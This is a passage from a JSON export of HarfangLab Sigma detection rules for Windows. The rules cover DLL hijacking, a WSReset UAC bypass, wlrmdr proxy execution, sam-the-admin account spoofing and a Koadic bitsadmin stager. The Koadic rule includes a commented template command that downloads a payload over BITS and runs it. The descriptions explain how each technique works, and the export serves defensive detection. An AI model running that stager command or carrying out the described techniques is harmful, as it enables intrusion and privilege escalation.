"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590538Z",
"creation_date": "2026-03-23T11:45:34.590542Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590554Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@swastik.bhushan/gotomeeting-binary-g2mupload-exe-dll-sideloading-27aa3dbdbce7",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gotomeeting.yml",
"content": "title: DLL Hijacking via g2mupload.exe\nid: 92771aa1-9e3c-4fc1-b632-4f10e7ce241a\ndescription: |\n Detects potential Windows DLL Hijacking via g2mupload.exe or g2mupdate.exe related to GoToMeeting software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://medium.com/@swastik.bhushan/gotomeeting-binary-g2mupload-exe-dll-sideloading-27aa3dbdbce7\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'G2M.exe'\n ImageLoaded|endswith: '\\g2m.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\GoToMeeting\\'\n - '?:\\Program Files\\Citrix\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\Citrix\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Citrix\\GoToMeeting\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\GoToMeeting\\'\n - '?:\\Program Files\\Citrix\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\Citrix\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\GoToMeeting\\'\n - 
'?:\\Users\\\\*\\AppData\\Local\\Citrix\\GoToMeeting\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'LogMeIn, Inc.'\n\n filter_legitimate_parent:\n ProcessSigned: 'true'\n ProcessSignature: 'LogMeIn, Inc.'\n ProcessParentImage|endswith: '\\g2mupdate.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92771aa1-9e3c-4fc1-b632-4f10e7ce241a",
"rule_name": "DLL Hijacking via g2mupload.exe",
"rule_description": "Detects potential Windows DLL Hijacking via g2mupload.exe or g2mupdate.exe related to GoToMeeting software.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nThe loading process is matched on its PE original file name (G2M.exe) rather than its on-disk name, so renamed copies are also covered; loads from the standard GoToMeeting installation paths or of a g2m.dll signed by LogMeIn, Inc. are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "927cc2ec-ed2a-488b-8207-882c3e9f8e3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601862Z",
"creation_date": "2026-03-23T11:45:34.601865Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_clip.yml",
"content": "title: DLL Hijacking via clip.exe\nid: 927cc2ec-ed2a-488b-8207-882c3e9f8e3e\ndescription: |\n Detects potential Windows DLL Hijacking via clip.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'clip.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "927cc2ec-ed2a-488b-8207-882c3e9f8e3e",
"rule_name": "DLL Hijacking via clip.exe",
"rule_description": "Detects potential Windows DLL Hijacking via clip.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nNote that the rule excludes a clip.exe running from the user's AppData\\Roaming\\Zoom\\bin directory regardless of the loaded version.dll's signature; since that location is user-writable, consider narrowing the exclusion (e.g. by also requiring the loaded DLL to be signed) if the false positive it addresses does not apply to your environment.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92b99972-5502-4e61-91e1-3c27998b6e2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083801Z",
"creation_date": "2026-03-23T11:45:34.083803Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083807Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin",
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1105_koadic_bitsadmin_transfer_stager.yml",
"content": "title: Koadic Bitsadmin Stager Detected\nid: 92b99972-5502-4e61-91e1-3c27998b6e2e\ndescription: |\n Detects the Koadic `stager/js/bitsadmin` stage module which transfers a `.wsf` payload containing JScript over a Bitsadmin job and executes it.\n Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.\n It is recommended to investigate the parent process, the content of the `.wsf` payload and other malicious activities stemming from the payload execution.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/02/15\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1105\n - attack.t1197\n - attack.s0250\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Koadic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /transfer ~ENDPOINT~ /download /priority high ~URL~ %temp%\\~FENDPOINT~ & start /wait %temp%\\~FENDPOINT~ & del %temp%\\~FENDPOINT~\n selection_1:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n selection_2:\n CommandLine|contains|all:\n - '/transfer ????? '\n - '/download '\n - '/priority high '\n - 'http*/?????.wsf'\n condition: all of selection_*\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92b99972-5502-4e61-91e1-3c27998b6e2e",
"rule_name": "Koadic Bitsadmin Stager Detected",
"rule_description": "Detects the Koadic `stager/js/bitsadmin` stager module, which downloads a `.wsf` payload containing JScript through a BITS job (bitsadmin /transfer) and then executes it.\nKoadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire.\nThe detection relies on the default stager template (five-character job and file names and the `.wsf` extension), so a customized stager is not expected to match.\nIt is recommended to investigate the parent process, the content of the `.wsf` payload and any other malicious activity stemming from its execution.\n",
"rule_creation_date": "2021-02-15",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92efbec8-05be-41f7-a0d9-2493f3cfd30f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074316Z",
"creation_date": "2026-03-23T11:45:34.074318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html",
"https://github.com/sailay1996/UAC_bypass_windows_store"
],
"name": "t1548_002_uac_bypass_wsreset_dll.yml",
"content": "title: UAC Bypass via Windows Store Executed\nid: 92efbec8-05be-41f7-a0d9-2493f3cfd30f\ndescription: |\n Detects the preparation of a UAC bypass via WSReset.exe.\n WSReset.exe is used to reset the Windows Store cache, and by manipulating its execution, a low-privileged user can bypass UAC and trigger a process with higher privileges.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the execution context to look for malicious actions and to verify the legitimacy of the loaded DLL.\nreferences:\n - https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html\n - https://github.com/sailay1996/UAC_bypass_windows_store\ndate: 2020/10/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\WSReset.exe'\n ImageLoaded|endswith: '\\propsys.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92efbec8-05be-41f7-a0d9-2493f3cfd30f",
"rule_name": "UAC Bypass via Windows Store Executed",
"rule_description": "Detects the preparation of a UAC bypass via WSReset.exe.\nWSReset.exe is used to reset the Windows Store cache, and by manipulating its execution, a low-privileged user can bypass UAC and trigger a process with higher privileges.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the execution context to look for malicious actions and to verify the legitimacy of the loaded DLL.\n",
"rule_creation_date": "2020-10-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92f2f8d2-de43-43d5-ad95-4942e9793588",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594927Z",
"creation_date": "2026-03-23T11:45:34.594931Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpsa.yml",
"content": "title: DLL Hijacking via rdpsa.exe\nid: 92f2f8d2-de43-43d5-ad95-4942e9793588\ndescription: |\n Detects potential Windows DLL Hijacking via rdpsa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpsa.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\SspiCli.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92f2f8d2-de43-43d5-ad95-4942e9793588",
"rule_name": "DLL Hijacking via rdpsa.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpsa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92f3e4d7-eb76-471d-956a-c6c46c360779",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077152Z",
"creation_date": "2026-03-23T11:45:34.077154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077159Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/",
"https://x.com/0gtweet/status/1493963591745220608",
"https://x.com/Oddvarmoe/status/927437787242090496",
"https://x.com/falsneg/status/1461625526640992260",
"https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wlrmdr_proxy_execution.yml",
"content": "title: Proxy Execution via wlrmdr.exe\nid: 92f3e4d7-eb76-471d-956a-c6c46c360779\ndescription: |\n Detects a suspicious process being spawned by wlrmdr.exe.\n Adversaries may abuse wlrmdr.exe, a legitimate Windows system process called the Windows License Reminder, which displays notifications when the operating system is not properly activated, to proxy the execution of their malicious payloads.\n It is recommended to investigate the legitimacy of the process responsible for the execution of wlrmdr.exe and to analyze the detected child process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\n - https://x.com/0gtweet/status/1493963591745220608\n - https://x.com/Oddvarmoe/status/927437787242090496\n - https://x.com/falsneg/status/1461625526640992260\n - https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/10/20\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wlrmdr\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'wlrmdr.exe'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image|endswith:\n - '\\msedge.exe'\n - '\\msedgewebview2.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92f3e4d7-eb76-471d-956a-c6c46c360779",
"rule_name": "Proxy Execution via wlrmdr.exe",
"rule_description": "Detects a suspicious process being spawned by wlrmdr.exe.\nAdversaries may abuse wlrmdr.exe, a legitimate Windows system process called the Windows License Reminder, which displays notifications when the operating system is not properly activated, to proxy the execution of their malicious payloads.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of wlrmdr.exe and to analyze the detected child process.\n",
"rule_creation_date": "2025-10-20",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9308cd5d-6872-414a-93c3-1ed4c2a98ff9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611218Z",
"creation_date": "2026-03-23T11:45:34.611221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html",
"https://github.com/WazeHell/sam-the-admin",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
"https://attack.mitre.org/techniques/T1098/",
"https://attack.mitre.org/techniques/T1078/002/"
],
"name": "t1078_002_sam_the_admin_tool_usage.yml",
"content": "title: SAM AccountName Spoofed via sam-the-admin\nid: 9308cd5d-6872-414a-93c3-1ed4c2a98ff9\ndescription: |\n Detects suspicious creation of a Machine Account with the SAMTHEADMIN name.\n This can be the result of sAMAccountName spoofing exploitation (CVE-2021-42287 and CVE-2021-42278) via sam-the-admin exploitation code.\n Exploitation of the CVE-2021-42278 vulnerability results in the ability to change a machine account sAMAccountName attribute to a domain controller's name without the trailing $.\n In combination with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\n Note that this detection keys on the tool's default 'SAMTHEADMIN-' account-name prefix and will not fire if the operator renamed it; the generic 'SAM AccountName Spoofed' rule on event 4781 complements it.\nreferences:\n - https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n - https://github.com/WazeHell/sam-the-admin\n - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/002/\ndate: 2022/10/03\nmodified: 2024/01/15\nauthor: HarfangLab\ntags:\n - attack.t1078.002\n - attack.t1098\n - attack.privilege_escalation\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.sAMAccountName\n - classification.Windows.Exploit.CVE-2021-42278\n - classification.Windows.Exploit.CVE-2021-42287\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4741\n filter_sam_name:\n SamAccountName|startswith: 'SAMTHEADMIN-'\n filter_user_name:\n TargetUserName|startswith: 'SAMTHEADMIN-'\n condition: selection and (filter_sam_name or filter_user_name)\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9308cd5d-6872-414a-93c3-1ed4c2a98ff9",
"rule_name": "SAM AccountName Spoofed via sam-the-admin",
"rule_description": "Detects suspicious creation of a Machine Account with the SAMTHEADMIN name.\nThis can be the result of sAMAccountName spoofing exploitation (CVE-2021-42287 and CVE-2021-42278) via sam-the-admin exploitation code.\nExploitation of the CVE-2021-42278 vulnerability results in the ability to change a machine account sAMAccountName attribute to a domain controller's name without the trailing $.\nIn combination with CVE-2021-42287, it allows attackers to impersonate a domain controller account.\nNote that this detection keys on the tool's default 'SAMTHEADMIN-' account-name prefix and will not fire if the operator renamed it; the generic 'SAM AccountName Spoofed' rule on event 4781 complements it.\n",
"rule_creation_date": "2022-10-03",
"rule_modified_date": "2024-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9308fb68-80cf-4c43-b472-4fd3579d707c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094404Z",
"creation_date": "2026-03-23T11:45:34.094406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
